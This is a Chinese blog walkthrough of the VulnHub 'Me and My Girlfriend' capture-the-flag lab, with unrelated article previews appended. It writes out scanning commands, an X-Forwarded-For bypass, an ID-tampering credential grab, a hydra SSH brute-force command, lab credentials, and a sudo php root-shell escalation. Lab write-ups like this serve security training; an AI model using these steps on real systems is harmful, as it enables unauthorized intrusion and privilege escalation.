首页 > 其他分享 >vulnhub Me and My Girlfriend靶场

vulnhub Me and My Girlfriend靶场

时间:2023-12-20 18:35:15浏览次数:36  
标签:Me 22 sudo 192.168 ssh 42.156 Girlfriend txt My

目录

1.信息收集

扫描存活主机

sudo arp-scan -l

扫描主机的开放端口

nmap -p- 192.168.42.156

2 (1)

扫描端口具体开放服务

nmap -p 22,80 -A -sV 192.168.42.156

3

扫描网站指纹

whatweb 192.168.42.156

4

2.漏洞挖掘

访问网站

5

F12,查看html

6

burp抓包

添加X-Forwarded-For:127.0.0.1

7

访问成功(因为他要本地访问所以每一个包都要加X-Forwarded-For:127.0.0.1)

开始逛街

8

发现登录框(弱密码不行)

9

register注册一个,发现id=12,改id找找其他的账号密码

18

3.漏洞利用

id=1,找到一个账号,继续

17

找到的账号密码写在两个文件中

19

有了账号密码,有22端口,ssh开始爆破

hydra -L 1.txt -P 2.txt ssh://192.168.42.156:22

20

找到账号

alice

4lic3

登录 ssh [email protected] -p 22

ls -a 查看文件,找到flag1

21

4.提升权限

常规查看

sudo -l

发现该账户有root(php)命令

22

在网站上查找php提权

https://gtfobins.github.io/

23

复制命令,执行命令

CMD="/bin/sh"

sudo php -r "system('$CDM')"

发现root成功

24

得到flag2.txt

cat flag2.txt

25

标签:Me,22,sudo,192.168,ssh,42.156,Girlfriend,txt,My
From: https://www.cnblogs.com/xiheaaa/p/17917199.html

相关文章

  • 使用阿里云性能测试工具 JMeter 场景压测 RocketMQ 最佳实践
    作者:森元需求背景新业务上线前,我们通常需要对系统的不同中间件进行压测,找到当前配置下中间件承受流量的上限,从而确定上游链路的限流规则,保护系统不因突发流量而崩溃。阿里云PTS的JMeter压测可以支持用户上传自定义的JMeter脚本,按照自定义的逻辑,借助PTS强大的分布式压测能力......
  • Mysql以及TCP socket的C++代码
    在使用socket编写tcp的C++程序时,遇到了一个问题:那就bind冲突了,分析原因:是因为std中有bind函数,而socket中也有,但是没有报重复定义的错误,这就有一点难办了。百度了一下:发现只要使用::bind就可以调用socket的bind。下面把这个套接字socket的server端代码贴出来:staticvoid*serv......
  • 使用阿里云性能测试工具 JMeter 场景压测 RocketMQ 最佳实践
    作者:森元需求背景新业务上线前,我们通常需要对系统的不同中间件进行压测,找到当前配置下中间件承受流量的上限,从而确定上游链路的限流规则,保护系统不因突发流量而崩溃。阿里云PTS的JMeter压测可以支持用户上传自定义的JMeter脚本,按照自定义的逻辑,借助PTS强大的分布式压测......
  • TimeZone
    概述<code>TimeZone</code>representsatimezoneoffset,andalsofiguresoutdaylightsavings.Typically,yougeta<code>TimeZone</code>using<code>getDefault</code>whichcreatesa<code>TimeZone</code>b......
  • mysql新增字典
    INSERTINTO`xxx`.`sys_dict`(`type`,`description`,`create_time`,`update_time`,`remarks`,`system`,`del_flag`,`tenant_id`)VALUES('status_flag','xxx','2022-08-0113:35:50','2022-08-0113:35:50','xxx&......
  • error: Your local changes to the following files would be overwritten by merge
    团队其他成员修改了某文件并已提交入库,你在pull之前修改了本地该文件,等你修改完代码再pull时,这时会报错如下错误  根据是否要保存本地修改,有以下两种解决方案2.1保留修改执行以下三条命令gitstash#封存修改gitpulloriginmastergitstashpop#把修改还原注:gitst......
  • mysql主从配置(1主2从)
    1、主库数据库配置[root@master~]#cat/etc/my.cnf#Foradviceonhowtochangesettingspleasesee#http://dev.mysql.com/doc/refman/5.7/en/server-configuration-defaults.html[mysqld]##Removeleading#andsettotheamountofRAMforthemostimportan......
  • 国标GB28181安防监控LiteCVR视频平台无法接入Ehome5.0的原因排查
    随着人工智能技术的迅速发展,未来的安防视频技术将更加智能化。通过深度学习和图像识别算法,安防摄像头可以自动识别异常行为、人脸识别、车辆识别等,从而提供更智能、自动化的安全监控。用户在现场使用LiteCVR平台接入ehome5.0,显示无法接入。针对这个情况我们来好好分析一下。......
  • datetime模块
    datetime模块(1)导入模块importdatetime(2)自定义日期并格式化datetime.date()自定义日期并格式化##2.自定义日期并格式化#res=datetime.date(2023,8,18)#print(res)##2023-08-18(3)获取本地时间datetime.date.today()获取年月日##(1)年月日#now_date=datetime.......
  • 【一个小发现】VictoriaMetrics 中 vmselect 的 `-search.denyPartialResponse` 选项
    作者:张富春(ahfuzhang),转载时请注明作者和引用链接,谢谢!cnblogs博客zhihuGithub公众号:一本正经的瞎扯一直以为vmselect的-search.denyPartialResponse选项是在vm-storage超时的时候返回预测的结果。实际测试是这样的:当vm-select对应的后端有多个vm-storage时,......